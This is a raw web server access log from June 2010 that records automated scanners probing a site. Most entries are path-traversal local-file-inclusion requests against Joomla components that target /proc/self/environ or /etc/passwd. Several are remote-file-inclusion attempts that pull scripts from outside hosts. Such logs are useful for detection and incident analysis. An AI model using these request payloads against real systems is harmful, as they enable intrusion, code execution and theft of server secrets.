74.53.154.162 - - [07/Jun/2010:04:59:10 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:04:59:10 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:04:59:10 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:04:59:10 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
84.38.67.248 - - [07/Jun/2010:04:59:42 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 "-""libwww-perl/5.813"
84.38.67.248 - - [07/Jun/2010:04:59:43 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 342 "-""libwww-perl/5.813"
74.53.154.162 - - [07/Jun/2010:05:00:11 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:00:16 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
66.209.177.98 - - [07/Jun/2010:05:00:37 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:05:00:37 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.53.154.162 - - [07/Jun/2010:05:00:55 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
209.188.90.44 - - [07/Jun/2010:05:00:58 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
67.195.112.180 - - [07/Jun/2010:05:01:13 -0500] "GET /logs/access_log.1234137600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.154.162 - - [07/Jun/2010:05:02:03 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
94.23.35.17 - - [07/Jun/2010:05:02:04 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.23.35.17 - - [07/Jun/2010:05:02:04 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.53.154.162 - - [07/Jun/2010:05:02:07 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
91.121.164.97 - - [07/Jun/2010:05:02:14 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:05:02:15 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
75.25.154.162 - - [07/Jun/2010:05:02:27 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:05:02:27 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [07/Jun/2010:05:03:12 -0500] "GET /logs/access_log.1243036800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.246.53.17 - - [07/Jun/2010:05:04:43 -0500] "GET /logs/access_log.1274832000//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:05:04:43 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:05:04:43 -0500] "GET /logs//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.209.177.98 - - [07/Jun/2010:05:05:32 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:05:05:32 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.14.126.220 - - [07/Jun/2010:05:06:12 -0500] "GET /logs/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.833"
216.14.126.220 - - [07/Jun/2010:05:06:12 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.833"
212.227.248.216 - - [07/Jun/2010:05:06:46 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://iyut.fileave.com/ID1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.227.248.216 - - [07/Jun/2010:05:06:46 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://iyut.fileave.com/ID1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
212.227.248.216 - - [07/Jun/2010:05:06:46 -0500] "GET /logs/access_log.1271548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://iyut.fileave.com/ID1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.55.146.200 - - [07/Jun/2010:05:07:04 -0500] "GET /templates/errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
72.55.146.200 - - [07/Jun/2010:05:07:04 -0500] "GET /logs/templates/errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.55.146.200 - - [07/Jun/2010:05:07:04 -0500] "GET /logs/access_log.1205107200/templates/errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
74.53.154.162 - - [07/Jun/2010:05:08:07 -0500] "GET /logs/access_log.1274313600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:08:09 -0500] "GET /logs/access_log.1274313600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:04 -0500] "GET /logs/access_log.1273622400/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:04 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:04 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:10 -0500] "GET /logs/access_log.1273622400/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:10 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:10 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:16 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:16 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:17 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:19 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:56 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:57 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:10:57 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
72.55.146.140 - - [07/Jun/2010:05:11:55 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:11:55 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:11:56 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:11:56 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:12:00 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:12:00 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
91.121.164.97 - - [07/Jun/2010:05:12:34 -0500] "GET /logs/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:05:12:34 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.253.162.10 - - [07/Jun/2010:05:12:37 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:12:37 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:12:37 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:12:37 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.23.35.17 - - [07/Jun/2010:05:12:44 -0500] "GET /logs/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.23.35.17 - - [07/Jun/2010:05:12:44 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.53.154.162 - - [07/Jun/2010:05:13:02 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:13:02 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:13:02 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
86.178.171.6 - - [07/Jun/2010:05:13:17 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_20"
74.53.154.162 - - [07/Jun/2010:05:13:18 -0500] "GET /logs/access_log.1273622400/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:13:45 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:13:45 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:13:46 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
209.188.90.44 - - [07/Jun/2010:05:14:26 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:05:14:26 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:05:14:26 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
174.121.64.231 - - [07/Jun/2010:05:14:39 -0500] "GET /logs/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
174.121.64.231 - - [07/Jun/2010:05:14:39 -0500] "GET /conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:15:23 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:15:23 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:15:23 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:15:23 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:15:23 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:15:23 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.53.154.162 - - [07/Jun/2010:05:15:28 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
87.253.162.10 - - [07/Jun/2010:05:15:35 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:15:36 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:15:37 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:15:37 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [07/Jun/2010:05:16:04 -0500] "GET /logs/access_log.1212192000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.253.162.10 - - [07/Jun/2010:05:16:10 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:16:11 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.53.154.162 - - [07/Jun/2010:05:16:33 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
213.175.212.36 - - [07/Jun/2010:05:18:08 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:08 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:08 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:08 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:12 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:12 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:12 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:13 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:35 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:35 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:56 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:18:58 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:01 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:01 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:03 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
72.55.146.140 - - [07/Jun/2010:05:19:07 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:19:07 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
